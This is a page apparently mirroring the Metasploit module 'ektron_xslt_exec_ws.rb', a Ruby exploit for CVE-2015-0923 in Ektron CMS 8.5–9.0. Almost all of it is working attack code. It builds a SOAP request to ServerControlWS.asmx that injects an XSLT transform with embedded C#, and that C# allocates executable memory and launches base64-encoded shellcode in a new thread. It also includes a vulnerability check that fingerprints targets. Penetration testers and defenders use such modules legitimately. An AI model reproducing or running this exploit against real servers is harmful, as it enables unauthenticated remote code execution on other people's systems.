CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::EXE1011def initialize(info = {})12super(update_info(info,13'Name' => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',14'Description' => %q{ Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have15vulnerabilities in various operations within the ServerControlWS.asmx16web services. These vulnerabilities allow for RCE without authentication and17execute in the context of IIS on the remote system.18},19'Author' => [20'catatonicprime'21],22'License' => MSF_LICENSE,23'References' =>24[25[ 'CVE', '2015-0923' ],26[ 'US-CERT-VU', '377644' ],27[ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]28],29'Payload' =>30{31'Space' => 2048,32'StackAdjustment' => -350033},34'Platform' => 'win',35'Privileged' => true,36'Targets' =>37[38['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X64, ARCH_X86 ] }]39],40'DefaultTarget' => 0,41'DisclosureDate' => '2015-02-05'42))4344register_options(45[46OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),47OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),48OptEnum.new('TARGETOP',49[50true,51'The vulnerable web service operation to exploit',52'ContentBlockEx',53[54'ContentBlockEx',55'GetBookmarkString',56'GetContentFlaggingString',57'GetContentRatingString',58'GetMessagingString'59]60])61])62end636465def vulnerable_param66return 'Xslt' if datastore['TARGETOP'] == 'ContentBlockEx'67'xslt'68end6970def required_params71return '' if datastore['TARGETOP'] == 'ContentBlockEx'72'<showmode/>'73end7475def target_operation76datastore['TARGETOP']77end7879def prologue80<<-XSLT81<?xml version="1.0" encoding="utf-8"?>82<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">83<soap:Body>84<#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">85#{required_params}86<#{vulnerable_param}>87<![CDATA[88<xsl:transform version="2.0"89xmlns:xsl="http://www.w3.org/1999/XSL/Transform"90xmlns:msxsl="urn:schemas-microsoft-com:xslt"91xmlns:user="http://mycompany.com/mynamespace">92<msxsl:script language="C#" implements-prefix="user">93XSLT94end9596def epilogue97<<-XSLT98</msxsl:script>99<xsl:template match="/">100<xsl:value-of select="user:xml()"/>101</xsl:template>102</xsl:transform>103]]>104</#{vulnerable_param}>105</#{target_operation}>106</soap:Body>107</soap:Envelope>108XSLT109end110111def check112113fingerprint = rand_text_alpha(5 + rand(5))114xslt_data = <<-XSLT115#{prologue}116public string xml() {117return "#{fingerprint}";118}119#{epilogue}120XSLT121122res = send_request_cgi(123{124'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",125'version' => '1.1',126'method' => 'POST',127'ctype' => "text/xml; charset=UTF-8",128'headers' => {129"Referer" => build_referer130},131'data' => xslt_data132})133134if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/135return Exploit::CheckCode::Vulnerable136end137return Exploit::CheckCode::Safe138end139140def uri_path141uri_path = target_uri.path142uri_path << "/" if uri_path[-1, 1] != "/"143uri_path144end145146def build_referer147if datastore['SSL']148schema = "https://"149else150schema = "http://"151end152153referer = schema154referer << rhost155referer << ":#{rport}"156referer << uri_path157referer158end159160def exploit161162print_status("Generating the EXE Payload and the XSLT...")163fingerprint = rand_text_alpha(5 + rand(5))164165xslt_data = <<-XSLT166#{prologue}167private static UInt32 MEM_COMMIT = 0x1000;168private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;169170[System.Runtime.InteropServices.DllImport("kernel32")]171private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);172173[System.Runtime.InteropServices.DllImport("kernel32")]174private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);175176public string xml()177{178string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";179byte[] shellcode = System.Convert.FromBase64String(shellcode64);180UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);181System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);182IntPtr hThread = IntPtr.Zero;183IntPtr pinfo = IntPtr.Zero;184UInt32 threadId = 0;185hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);186return "#{fingerprint}";187}188#{epilogue}189XSLT190191print_status("Trying to run the xslt transformation...")192res = send_request_cgi(193{194'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",195'version' => '1.1',196'method' => 'POST',197'ctype' => "text/xml; charset=UTF-8",198'headers' => {199"Referer" => build_referer200},201'data' => xslt_data202})203if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/204print_good("Exploitation was successful")205else206fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")207end208209end210end211212213